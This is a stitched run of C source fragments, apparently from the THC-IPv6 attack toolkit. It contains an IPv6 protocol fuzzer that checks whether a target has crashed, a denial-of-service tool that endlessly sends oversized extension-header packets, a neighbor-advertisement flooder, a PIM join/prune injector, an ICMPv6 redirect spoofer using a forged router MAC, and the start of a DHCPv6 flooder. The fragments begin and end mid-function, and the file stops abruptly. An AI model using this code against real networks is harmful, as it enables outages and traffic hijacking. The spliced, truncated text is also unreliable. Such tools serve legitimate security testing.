test_cnt = 0; test_ptr++; test_pos++; } break; case 'B': if (test_cnt <= COUNT_BYTE) { if (pkt_bak[test_pos] != bytes[test_cnt - 1]) hdr->pkt[test_pos] = bytes[test_cnt - 1]; else do_it = 0; } else { i = 0; while (i < COUNT_BYTE && do_it) { if (bytes[i] == pkt_bak[test_pos]) do_it = 0; i++; } if (do_it) hdr->pkt[test_pos] = hdr->pkt[test_pos] ^ xors[test_cnt - COUNT_BYTE - 1]; } if (test_cnt == COUNT_BYTE + COUNT_XOR) { test_cnt = 0; test_ptr++; test_pos++; } break; case 'F': if (test_cnt <= COUNT_FLAG) { if (pkt_bak[test_pos] != flags[test_cnt - 1]) hdr->pkt[test_pos] = flags[test_cnt - 1]; else do_it = 0; } else { i = 0; while (i < COUNT_FLAG && do_it) { if (bytes[i] == pkt_bak[test_pos]) // yes, bytes[] is the right one even for flags do_it = 0; i++; } if (do_it) hdr->pkt[test_pos] = hdr->pkt[test_pos] ^ xors[test_cnt - COUNT_BYTE - 1]; } if (test_cnt == COUNT_FLAG + COUNT_XOR) { test_cnt = 0; test_ptr++; test_pos++; } break; case 'W': sip = (unsigned short int *) &pkt_bak[test_pos]; if (test_cnt <= COUNT_WORD) { if (*sip != words[test_cnt - 1]) memcpy((char *) &hdr->pkt[test_pos], (char *) &words[test_cnt - 1] + _TAKE2, 2); else do_it = 0; } else { i = 0; while (i < COUNT_WORD && do_it) { if (words[i] == *sip) do_it = 0; i++; } if (do_it) { i = *sip ^ xors[test_cnt - COUNT_WORD - 1]; sip = (unsigned short int *) &hdr->pkt[test_pos]; *sip = i % 65536; } } if (test_cnt == COUNT_WORD + COUNT_XOR) { test_cnt = 0; test_ptr++; test_pos += 2; } break; default: fprintf(stderr, "This character should not be in the fuzz string, shoot the programmer: %c(%d) position %d string %s\n", fuzzbuf[test_ptr], fuzzbuf[test_ptr], test_ptr, fuzzbuf); exit(-1); break; } if (do_it && do_fuzz) { if (test_current >= test_start && test_current <= test_end && do_fuzz) { // fill icmp id+seq and unique buffer with test case number if (fragment) memcpy(hdr->pkt + frag_offset + 58, (char *) &test_current + _TAKE4, 4); switch (do_type) { case DO_NONE: // empty break; case DO_PING: for (i = 0; i < 4 + 1; i++) memcpy(hdr->pkt + offset + 58 + i * 4, (char *) &test_current + _TAKE4, 4); break; case DO_TCP: memcpy(hdr->pkt + offset + 58, (char *) &test_current + _TAKE4, 4); break; case DO_NEIGHSOL: case DO_NEIGHADV: break; // do nothing for these case DO_NODEQUERY: memcpy(hdr->pkt + offset + 66, (char *) &test_current + _TAKE4, 4); break; case DO_RA: memcpy(hdr->pkt + offset + 0x62, (char *) &test_current + _TAKE4, 4); // prefix update memcpy(hdr->pkt + offset + 0x7e, hdr->pkt + offset + 0x5e, 16); // routing update memcpy(hdr->pkt + 8, (char *) &test_current + _TAKE4, 4); // srcmac update memcpy(hdr->pkt + offset + 0x72, (char *) &test_current + _TAKE4, 4); // srcmac update memcpy(hdr->pkt + 0x10 + off2, (char *) &test_current + _TAKE4, 4); // srcip update memcpy(hdr->original_src, hdr->pkt + 8 + off2, 16); // srcip update for checksum break; case DO_MLD_QUERY: case DO_MLD_DONE: case DO_MLD_REP: case DO_MLD2_QUERY: memcpy(hdr->pkt + offset + 0x4a, (char *) &test_current + _TAKE4, 4); break; case DO_MLD2_REPORT: //??? XXX TODO CHECK memcpy(hdr->pkt + offset + 0x4d, (char *) &test_current + _TAKE4, 4); memcpy(hdr->pkt + offset + 0x4d + 68, (char *) &test_current + _TAKE4, 4); memcpy(hdr->pkt + offset + 0x4d + 136, (char *) &test_current + _TAKE4, 4); break; default: fprintf(stderr, "ERROR!!!\n"); exit(-1); } // regenerate checksum if (do_type != DO_TCP && do_type != DO_NONE) { // maybe for later non-icmp stuff hdr->pkt[offset + 56] = 0; hdr->pkt[offset + 57] = 0; i = checksum_pseudo_header(hdr->original_src, hdr->final_dst, NXT_ICMP6, &hdr->pkt[offset + 54], hdr->pkt_len - offset - 54); hdr->pkt[offset + 56] = i / 256; hdr->pkt[offset + 57] = i % 256; } else { // TCP hdr->pkt[offset + 70] = 0; hdr->pkt[offset + 71] = 0; i = checksum_pseudo_header(hdr->original_src, hdr->final_dst, NXT_TCP, &hdr->pkt[offset + 54], hdr->pkt_len - offset - 54); hdr->pkt[offset + 70] = i / 256; hdr->pkt[offset + 71] = i % 256; } // send packet for (k = 0; k < no_send; k++) { while(thc_send_pkt(interface, pkt, &pkt_len) < 0) usleep(1); } printf("."); usleep(250); // if ping, check ping again if ((test_current - test_start) % ping == 0 && test_current != 0 && test_start != test_current) if (check_alive(p, interface, srcmac, mac, src6, real_dst6) == 0) { i = ((((test_current - test_start) / ping) - 1) * ping) + test_start + 1; printf("\nResult: target %s crashed during fuzzing, offending test case no. could be %d to %d\n", argv[optind + 1], i < 0 ? 0 : i, test_current); exit(1); } } //else printf("NOT SENT - NOT IN TEST LIST\n"); // reset to basic packet memcpy(hdr->pkt, pkt_bak, hdr->pkt_len); test_current++; } //else printf("NOT SENT!\n"); } printf("\n"); // ping afterwards to check if it worked if (do_alive) { if (check_alive(p, interface, srcmac, mac, src6, real_dst6) == 0) { printf("Result: target %s is NOT alive via direct ping6 - good work! (position: %d)\n", argv[optind + 1], test_pos); exit(1); } else printf("Result: target %s is still alive via direct ping6, better luck next time.\n", argv[optind + 1]); } thc_pcap_close(p); return 0; }
int main(int argc, char *argv[]) { int test = 0, count = 1, tmplen; unsigned char buf[65536], bla[1500], tests[256]; unsigned char *dst6, *ldst6 = malloc(16), *src6, *lsrc6, *mcast6, *route6, *mal; unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6]; thc_ipv6_hdr *hdr; int i, j, k, srcmtu, fragsize; unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL; int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0, mtu = 1500; char *interface, *randptr = NULL; thc_ipv6_hdr *ipv6; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } interface = argv[1]; if ((dst6 = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: invalid target: %s\n", argv[2]); exit(-1); } //route6 = thc_resolve6("2a01::"); memcpy(ldst6, dst6, 16); memset(ldst6 + 2, 0, 6); ldst6[0] = 0xfe; ldst6[1] = 0x80; mcast6 = thc_resolve6("ff02::1"); if (argc >= 4) test = atoi(argv[3]); memset(null_buffer, 0, sizeof(null_buffer)); src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL); if ((lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK)) == NULL) { fprintf(stderr, "Error: invalid interface: %s\n", interface); exit(-1); } srcmac = thc_get_own_mac(interface); if (rawmode == 0) { if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) { fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]); exit(-1); } } else dstmac = null_buffer; if ((srcmtu = thc_get_mtu(interface)) <= 0) { fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface); exit(-1); } fragsize = ((srcmtu - 62) / 8) * 8; setvbuf(stdout, NULL, _IONBF, 0); memset(buf, 0, sizeof(buf)); memset(tests, 0, sizeof(tests)); memset(bla, 0, sizeof(bla)); if (test < 1 || test > MAX_TEST) { printf("%s %s (c) 2014 by %s %s\n\n", argv[0], VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface destination test-case-number\n\n", argv[0]); printf("The following test cases are currently implemented:\n"); printf(" 1 : large hop-by-hop header with router-alert and filled with unknown options\n"); printf(" 2 : large destination header filled with unknown options\n"); printf(" 3 : hop-by-hop header with router alert option plus 180 headers\n"); printf(" 4 : hop-by-hop header with router alert option plus 178 headers + ping\n"); printf(" 5 : AH header + ping\n"); printf(" 6 : first fragments of a ping with a hop-by-hop header with router alert\n"); printf(" 7 : large hop-by-hop header filled with unknown options (no router alert)\n"); exit(0); } printf("Performing denial of service test case no. %d attack on %s via %s:\n", test, argv[2], argv[1]); printf("A \".\" is shown for every 1000 packets sent, press Control-C to end...\n"); /********************** TEST CASE PREPARATION *************************/ if (test == count) { // 1432 printf("Test %d: large hop-by-hop header with router-alert and filled with unknown options.\n", count); printf("WARNING: this attack affects all routers on the network path to the target!!\n"); sleep(3); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; buf[0] = 5; buf[1] = 2; j = 4; i = 1; while (i <= 67) { k = (i % 63) + 1; buf[j] = k; switch (k) { case 38: // quickstart buf[j + 1] = 7; // length buf[j + 2] = 1; // request type + rate buf[j + 3] = 60; //qs-ttl buf[j + 4] = 8; // nonce j += 9; break; case 4: buf[j + 1] = 1; j += 3; break; case 0: case 5: buf[j] = 1; // fall through default: buf[j + 1] = 4; j += 6; } // j += buf[j + 1] + 2; i++; } // for (i = 1; i < 236; i++) { // buf[i * 6 - 2] = (i % 63) + 1; // buf[i * 6 - 1] = 4; // } if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, j) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; } count++; if (test == count) { // 1432 printf("Test %d: large destination header filled with unknown options.\n", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; for (i = 1; i < 237; i++) { buf[6 + i * 6] = (i % 63) + 1; buf[5 + i * 6] = 4; } if (thc_add_hdr_dst(pkt, &pkt_len, buf, 1416) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; } count++; if (test == count) { j = (thc_get_mtu(interface) - 48) / 8; if (j < 150 || j > 8000) { fprintf(stderr, "Error: invalid MTU on interface\n"); exit(-1); } printf("Test %d: hop-by-hop header with router alert option plus %d headers.\n", count, j); printf("WARNING: this attack affects all routers on the network path to the target!!\n"); sleep(3); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; buf[0] = 5; buf[1] = 2; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) < 0) return -1; memset(buf, 0, 2); for (i = 0; i < j; i++) if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) < 0) return -1; // thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; } count++; if (test == count) { j = (thc_get_mtu(interface) - 64) / 8; if (j < 150 || j > 8000) { fprintf(stderr, "Error: invalid MTU on interface\n"); exit(-1); } printf("Test %d: hop-by-hop header with router alert option plus %d headers plus ping.\n", count, j); printf("WARNING: this attack affects all routers on the network path to the target!!\n"); sleep(3); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; buf[0] = 5; buf[1] = 2; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) < 0) return -1; memset(buf, 0, 2); for (i = 0; i < j; i++) if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; } count++; if (test == count) { printf("Test %d: AH header plus ping.\n", count); printf("WARNING: this attack affects all routers on the network path to the target!!\n"); sleep(3); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_hdr_misc(pkt, &pkt_len, NXT_AH, -1, (unsigned char *) &buf, 6 + 8) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; ipv6 = (thc_ipv6_hdr *) pkt; if (do_hdr_size != 0) ipv6->pkt[do_hdr_size + 40 + 1] = 2; else ipv6->pkt[14 + 40 + 1] = 2; } count++; if (test == count) { printf("Test %d: first ping fragment with hop-by-hop and router alert.\n", count); printf("WARNING: this attack affects all routers on the network path to the target!!\n"); sleep(3); buf[0] = 5; buf[1] = 2; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, (unsigned char *) &buf, 6) < 0) return -1; if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 1, 0xfacebabe + getpid() + count)) return -1; buf[0] = ICMP6_MLD_REPORT; buf[1] = 0; buf[2] = 0xb0; buf[3] = 0x0b; if (thc_add_data6(pkt, &pkt_len, NXT_ICMP6, buf, 14)) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; ipv6 = (thc_ipv6_hdr *) pkt; if (do_hdr_size != 0) randptr = ipv6->pkt + do_hdr_size + 40 + 8 + 4; else randptr = ipv6->pkt + 14 + 40 + 8 + 4; } count++; if (test == count) { // 1432 printf("Test %d: large hop-by-hop header with filled with unknown options (no router alert).\n", count); printf("WARNING: this attack affects all routers on the network path to the target!!\n"); sleep(3); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; j = 0; i = 1; while (i <= 67) { k = (i % 63) + 1; buf[j] = k; switch (k) { case 38: // quickstart buf[j + 1] = 7; // length buf[j + 2] = 1; // request type + rate buf[j + 3] = 60; //qs-ttl buf[j + 4] = 8; // nonce j += 9; break; case 4: buf[j + 1] = 1; j += 3; break; case 0: case 5: buf[j] = 1; // fall through default: buf[j + 1] = 4; j += 6; } // j += buf[j + 1] + 2; i++; } // for (i = 1; i < 236; i++) { // buf[i * 6 - 2] = (i % 63) + 1; // buf[i * 6 - 1] = 4; // } if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, j) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; } count++; if (test == count) { // dummy entry // code fprintf(stderr, "to implement\n"); exit(-1); } count++; /******************* END OF TESTCASE PREPARATION **************************/ count = 0; while (1) { thc_send_pkt(interface, pkt, &pkt_len); usleep(1); count++; if (randptr != NULL) memcpy(randptr, (char*)&count + _TAKE4, 4); if (count % 1000 == 0) printf("."); } return 0; }
int main(int argc, char *argv[]) { char *interface, mac[6] = ""; unsigned char *mac6 = mac, *ip6; unsigned char buf[24], srcmac[8] = "", *smac = NULL; unsigned char *dst = thc_resolve6("ff02::1"), *dstmac = thc_get_multicast_mac(dst); int i; unsigned char *pkt = NULL; int pkt_len = 0, flags, rawmode = 0, count = 0, prefer = PREFER_LINK, keepmac = 0; if (argc > 2 && strncmp(argv[1], "-k", 2) == 0) { keepmac = 1; if ((smac = thc_get_own_mac(argv[2])) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", argv[2]); exit(-1); } argv++; argc--; } if (argc > 2 && strncmp(argv[1], "-m", 2) == 0) { sscanf(argv[2], "%x:%x:%x:%x:%x:%x", (unsigned int *) &srcmac[0], (unsigned int *) &srcmac[1], (unsigned int *) &srcmac[2], (unsigned int *) &srcmac[3], (unsigned int *) &srcmac[4], (unsigned int *) &srcmac[5]); smac = srcmac; argv+=2; argc-=2; } if (smac != NULL) mac6 = smac; if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[1]; if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (argc == 3) { if ((dst = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: invalid target IPv6 address\n"); exit(-1); } else { dstmac = thc_get_mac(interface, NULL, dst); } if (dst[0] >= 0x20 && dst[0] <= 0xfd) prefer = PREFER_GLOBAL; } ip6 = thc_get_own_ipv6(interface, dst, prefer); mac[0] = 0x00; mac[1] = 0x18; memset(ip6 + 8, 0, 8); ip6[8] = 0x02; ip6[9] = mac[1]; ip6[11] = 0xff; ip6[12] = 0xfe; memset(buf, 0, sizeof(buf)); buf[16] = 2; buf[17] = 1; buf[18] = mac[0]; buf[19] = mac[1]; memcpy(buf, ip6, 16); flags = ICMP6_NEIGHBORADV_OVERRIDE; printf("Starting to flood network with neighbor advertisements on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (1) { for (i = 2; i < 6; i++) mac[i] = rand() % 256; // ip6[9] = mac[1]; ip6[10] = mac[2]; ip6[13] = mac[3]; ip6[14] = mac[4]; ip6[15] = mac[5]; count++; memcpy(buf + 10, ip6 + 10, 6); memcpy(&buf[20], mac + 2, 4); if ((pkt = thc_create_ipv6_extended(interface, prefer, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, flags, buf, sizeof(buf), 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) { // fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface); // perror(""); // return -1; printf("!"); } pkt = thc_destroy_packet(pkt); // usleep(1); if (count % 1000 == 0) printf("."); } return 0; }
/** Função principal que realiza o host scan IPv6 na rede */ int hostScan(int rawmode, // informa se o "raw mode" foi ativado ou nao char *interface, // nome da interface de analise unsigned char *multicast6, // endereco do grupo multicast de destino unsigned char *router6, // roteador da rota parametrizada unsigned char **routers) { unsigned char *src6 = NULL, // endereco ip6 do host [que realiza o scan] *mac = NULL, // endereco MAC do host [que realiza o scan] string[64] = "ip6 and dst "; // Mascara de captura de pacotes [apenas 1pv6 e destino a ser marcado] time_t passed; // timestamp do inicio do scan pcap_t *p; // contexto pcap de captura // obtendo seu proprio endereco ip6 src6 = thc_get_own_ipv6(interface, multicast6, PREFER_GLOBAL); // se estiver operando em "raw mode" deve-se resolver seu proprio endereco MAC if (rawmode == 0 && (mac = thc_get_mac(interface, src6, multicast6)) == NULL) { fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", thc_ipv62string(src6)); exit(-1); } // setar o endereco do host para a filtragem de pacotes recebidos strcat(string, thc_string2notation(thc_ipv62string(src6))); // make the sending buffer unique memset(buf, 'A', sizeof(buf)); // Preenche o buffer com o caractere 'A' time((time_t *) & buf[2]); // coloca da 3a posicao do buffer o tempo em segundos [padrao] buf[10] = getpid() % 256; // coloca o valor do process id .. buf[11] = getpid() / 256; // .. nas posicoes 11 e 12 do buffer memcpy(&buf[12], multicast6, 4); // coloca o endereco de multicast na 13a posicao do buffer // inicializa a interface de captura de pacotes com o filtro criado if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } // Envio do 1o pacote : Echo Request Comum sendEchoRequest(interface, multicast6, src6, router6, routers, buf, mac, NULL); // Envio do 2o pacote : Echo Request Com falha de Opções sendEchoRequestOptions(interface, multicast6, src6, router6, routers, buf, mac); // altera os dados do buffer ??? buf[0] = NXT_INVALID; buf[1] = 1; // Envio do 3o pacote : Echo Request Com dados Hop by Hop sendEchoRequestHopByHop(interface, multicast6, src6, router6, routers, buf, mac); // ??? while (thc_pcap_check(p, (char *) check_packets, NULL) > 0 && (alive_no == 0 || *multicast6 == 0xff)); // Anota o tempo de inicio passed = time(NULL); // enquanto nao se passam 5 segundos while (passed + 5 >= time(NULL) && (alive_no == 0 || *multicast6 == 0xff)) thc_pcap_check(p, (char *) check_packets, NULL); // verifica os pacotes capturados // fecha a interface de captura thc_pcap_close(p); // informa o numero de hosts ativos encontrados //printf("Found %d systems alive\n", alive_no); printf("\n"); printAliveSystems(); }
int main(int argc, char *argv[]) { unsigned char *pkt1 = NULL, buf[100]; unsigned char *dst6 = NULL, *src6 = NULL, *multicast6, *target6, *neighbor6; int pkt1_len = 0, i = 0; char *interface; int ttl = 1, mode = -1, len = 0; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "t:s:d:")) >= 0) { switch (i) { case 't': ttl = atoi(optarg); break; case 's': src6 = thc_resolve6(optarg); break; case 'd': dst6 = thc_resolve6(optarg); break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } interface = argv[optind]; if (strncasecmp(argv[optind + 1], "hello", 3) == 0) mode = 0; if (strncasecmp(argv[optind + 1], "join", 3) == 0) mode = 1; if (strncasecmp(argv[optind + 1], "prune", 3) == 0) { mode = 2; } if (mode == -1) { fprintf(stderr, "Error: no mode defined, specify hello, join or prune\n"); exit(-1); } if (mode != 0) { if (argc - optind != 5) { fprintf(stderr, "Error: join/prune mode need a multicast and target address\n"); exit(-1); } neighbor6 = thc_resolve6(argv[optind + 2]); multicast6 = thc_resolve6(argv[optind + 3]); target6 = thc_resolve6(argv[optind + 4]); if (multicast6 == NULL || target6 == NULL || neighbor6 == NULL) { fprintf(stderr, "Error: unable to resolve addresses\n"); exit(-1); } } if (dst6 == NULL) dst6 = thc_resolve6("ff02::d"); if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt1_len, src6, dst6, ttl, 0, 0, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); // here we set buf and len switch(mode) { case 0: buf[1] = 1; buf[3] = 2; buf[5] = 255; buf[7] = 19; buf[9] = 4; if (argc - optind >= 3) { i = atoi(argv[optind + 2]); buf[10] = i / 256*256*256; buf[11] = (i / 65536) % 256; buf[12] = (i % 65536) / 256; buf[13] = i % 256; } len = 14; break; default: buf[0] = 2; memcpy(buf + 2, neighbor6, 16); buf[19] = 1; buf[21] = 255; buf[22] = 2; buf[25] = 128; memcpy(buf + 26, multicast6, 16); if (mode == 1) buf[43] = 1; else buf[45] = 1; buf[46] = 2; buf[48] = 7; buf[49] = 128; memcpy(buf + 50, target6, 16); len = 66; mode = 3; } if (thc_add_pim(pkt1, &pkt1_len, mode, buf, len) < 0) return -1; if (thc_generate_pkt(interface, NULL, NULL, pkt1, &pkt1_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } while (thc_send_pkt(interface, pkt1, &pkt1_len) < 0) usleep(5); printf("Sent PIM %s message\n", mode == 0 ? "hello" : mode == 1 ? "join" : "prune"); return 0; }
int main(int argc, char *argv[]) { char string[] = "ip6 and ! src net f000::/4 and ! dst net f000::/4"; int rawmode = 0, i; pcap_t *p; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "cr")) >= 0) { switch (i) { case 'r': thc_ipv6_rawmode(1); rawmode = 1; offset = 0; break; case 'c': loop = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 3) help(argv[0]); if (do_hdr_size) offset = do_hdr_size; interface = argv[optind]; mac6 = thc_get_own_mac(interface); src6 = thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL); mtu = atoi(argv[optind + 2]); if (src6 == NULL || mac6 == NULL) { fprintf(stderr, "Error: invalid interface or IPv6 not available: %s\n", interface); exit(-1); } if (argv[optind + 1][0] == '*' || argv[optind + 1][1] == '*') { ip6 = NULL; } else { ip6 = thc_resolve6(argv[optind + 1]); if (ip6 == NULL) { fprintf(stderr, "Error: target address is invalid: %s\n", argv[optind + 1]); exit(-1); } } if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } printf("Watching for %s from %s (Press Control-C to end) ...\n", loop == 0 ? "a packet" : "packets", argv[optind + 1]); do { thc_pcap_check(p, (char *) send_toobig, NULL); usleep(25); } while (go); thc_pcap_close(p); return 0; }
int main(int argc, char *argv[]) { unsigned char *pkt = NULL, buf[16], mac[16] = ""; unsigned char *mac6 = mac, *src6, *target6, *oldrouter6, *newrouter6, *self6, *fakemac; thc_ipv6_hdr *ipv6; char *interface; int pkt_len, rawmode = 0, ttl = 64, offset = 14; if (argc < 6 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } if (do_hdr_size) offset = do_hdr_size; interface = argv[1]; src6 = thc_resolve6(argv[2]); target6 = thc_resolve6(argv[3]); oldrouter6 = thc_resolve6(argv[4]); if ((newrouter6 = thc_resolve6(argv[5])) == NULL) { fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[5]); exit(-1); } if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } /* Spoof source mac */ if ((self6 = thc_get_own_ipv6(interface, oldrouter6, PREFER_GLOBAL)) == NULL) { fprintf(stderr, "Error: could not get own IP address to contact original-router\n"); exit(-1); } if ((fakemac = thc_get_mac(interface, self6, oldrouter6)) == NULL) { fprintf(stderr, "Error: could not resolve mac address for original-router\n"); free(self6); exit(-1); } if (rawmode == 0) { if (argc >= 7) sscanf(argv[6], "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); else mac6 = thc_get_own_mac(interface); } if (argc >= 8) ttl = atoi(argv[7]); if (ttl <= 0 || ttl > 255) ttl = 64; memset(buf, 'A', 16); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, target6, src6, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, 16, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, fakemac, NULL, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Can not send packet, exiting ...\n"); exit(-1); } usleep(25000); ipv6 = (thc_ipv6_hdr *) pkt; thc_inverse_packet(ipv6->pkt + offset, ipv6->pkt_len - offset); ipv6->pkt[offset + 7] = (unsigned char) ttl; thc_redir6(interface, oldrouter6, fakemac, NULL, newrouter6, mac6, ipv6->pkt + 14, ipv6->pkt_len - 14); printf("Sent ICMPv6 redirect for %s\n", argv[3]); free(self6); free(fakemac); return 0; }
int main(int argc, char *argv[]) { char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL, *pkt2 = NULL; char wdatabuf[1024], wdatabuf2[1024]; unsigned char *mac6 = mac, *src, *dst; int i, s, len, len2, pkt_len = 0, pkt2_len = 0; unsigned long long int count = 0; pcap_t *p = NULL; int do_all = 1, use_real_mac = 1, use_real_link = 1; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); while ((i = getopt(argc, argv, "dnNr1")) >= 0) { switch (i) { case 'N': use_real_link = 1; // no break case 'n': use_real_mac = 1; break; case '1': do_all = 0; break; case 'r': i = 0; break; // just to ignore -r default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } memset(mac, 0, sizeof(mac)); interface = argv[optind]; if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } dns_name = argv[optind + 1]; if (use_real_link) src = thc_get_own_ipv6(interface, NULL, PREFER_LINK); else src = thc_resolve6("fe80::"); if (use_real_mac) mac6 = thc_get_own_mac(interface); dst = thc_resolve6("ff02::1:2"); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); // only to prevent our system to send icmp port unreachable messages if ((s = thc_bind_udp_port(546)) < 0) fprintf(stderr, "Warning: could not bind to 546/udp\n"); if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) { fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface); exit(-1); } len = sizeof(solicit); memcpy(wdatabuf, solicit, len); len2 = sizeof(inforeq); memcpy(wdatabuf2, inforeq, len2); printf("Sending DHCPv6 Solicitate message ...\n"); printf("Sending DHCPv6 Information Request message ...\n"); if (!use_real_link) memcpy(src + 8, (char *) &count, 8); // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand for (i = 0; i < 3; i++) { wdatabuf[i + 32] = rand() % 256; wdatabuf[i + 18] = rand() % 256; mac[i + 2] = rand() % 256; } if (!use_real_mac) memcpy(wdatabuf + 22, mac, 6); if (!use_real_mac) memcpy(wdatabuf2 + 18, mac, 6); memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3); memcpy(wdatabuf2 + 1, (char *) &count + _TAKE3, 3); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_udp(pkt, &pkt_len, 546, 